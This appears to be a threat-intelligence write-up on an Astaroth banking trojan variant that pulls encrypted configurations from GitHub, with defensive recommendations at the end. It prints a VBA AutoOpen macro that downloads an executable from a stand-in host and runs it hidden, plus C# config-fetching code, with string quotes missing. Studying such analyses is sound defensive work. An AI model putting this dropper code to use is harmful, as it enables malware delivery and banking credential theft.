A new variant of the Astaroth banking trojan has surfaced, employing innovative tactics to distribute its malicious configuration files. First identified in late 2025, this campaign utilizes GitHub’s raw content service to host encrypted JSON configurations containing target URLs, browser injection parameters, and command-and-control (C2) endpoints. By leveraging GitHub’s trusted domain, Astaroth effectively evades traditional network-based detections and blends seamlessly with routine developer traffic.
Delivery Mechanism
The delivery method remains consistent with previous Astaroth outbreaks, primarily relying on spear-phishing emails. These emails often masquerade as communications from financial institutions or corporate partners, citing urgent invoice discrepancies to lure recipients. Attached to these emails are malicious Word documents embedded with obfuscated macros and decoy content designed to deceive analysts.
Upon opening the malicious document, a Visual Basic for Applications (VBA) macro is triggered, executing the following sequence:
“`vba
Sub AutoOpen()
Dim objHTTP As Object
Dim strURL As String
Dim strTemp As String
Set objHTTP = CreateObject(MSXML2.XMLHTTP)
strURL = https://example.com/loader.exe
objHTTP.Open GET, strURL, False
objHTTP.Send
strTemp = Environ(TEMP) & \ldr.exe
If objHTTP.Status = 200 Then
Set objFSO = CreateObject(Scripting.FileSystemObject)
Set objFile = objFSO.CreateTextFile(strTemp, True)
objFile.Write objHTTP.responseBody
objFile.Close
CreateObject(WScript.Shell).Run strTemp, 0, False
End If
End Sub
“`
This macro downloads a lightweight .NET loader from a remote site. Once executed, the loader accesses GitHub’s raw content URLs to retrieve the next-stage configuration. The configuration is decrypted in memory, initiating multiple threads for web injection and credential harvesting.
Evasion Techniques
Astaroth employs several sophisticated evasion techniques to remain undetected:
– Process Hollowing and Masquerading: The malware uses process hollowing and parent-child process masquerading to avoid detection by sandbox environments.
– Minimal Disk Footprint: It minimizes the number of files dropped to disk, reducing the likelihood of detection by traditional antivirus solutions.
– Registry Manipulation: Registry entries are crafted to appear as legitimate Microsoft Office components, complicating forensic analysis.
Impact and Targets
Primarily targeting banking customers in Europe and North America, Astaroth’s impact includes:
– Unauthorized Fund Transfers: The malware facilitates illicit transfers from victims’ bank accounts.
– Credential Theft: It harvests login credentials across multiple online banking portals.
– Potential Ransomware Deployment: In certain cases, Astaroth deploys ransomware to facilitate lateral movement within networks.
Technical Details
The infection chain reveals a multi-stage process designed for stealth and reliability. After the initial macro execution and loader download, the .NET routine fetches and decrypts the GitHub-hosted configuration:
“`csharp
var url = https://raw.githubusercontent.com/user/repo/main/config.dat;
using var wc = new WebClient();
byte[] data = wc.DownloadData(url);
byte[] decrypted = DecryptConfig(data, key);
var configJson = Encoding.UTF8.GetString(decrypted);
“`
This approach underscores Astaroth’s reliance on legitimate infrastructure to obscure its malicious intent, complicating the ability of network defenders to distinguish between benign and malicious traffic.
Recommendations
To mitigate the threat posed by Astaroth, organizations should:
– Monitor GitHub Access: Continuously monitor unusual GitHub raw content access from non-developer endpoints.
– Enhance Email Security: Implement advanced email filtering to detect and block spear-phishing attempts.
– Educate Employees: Conduct regular training sessions to raise awareness about phishing tactics and safe email practices.
– Implement Behavioral Analysis: Deploy security solutions capable of detecting process hollowing and other evasion techniques.
By adopting these measures, organizations can strengthen their defenses against sophisticated malware campaigns like Astaroth.
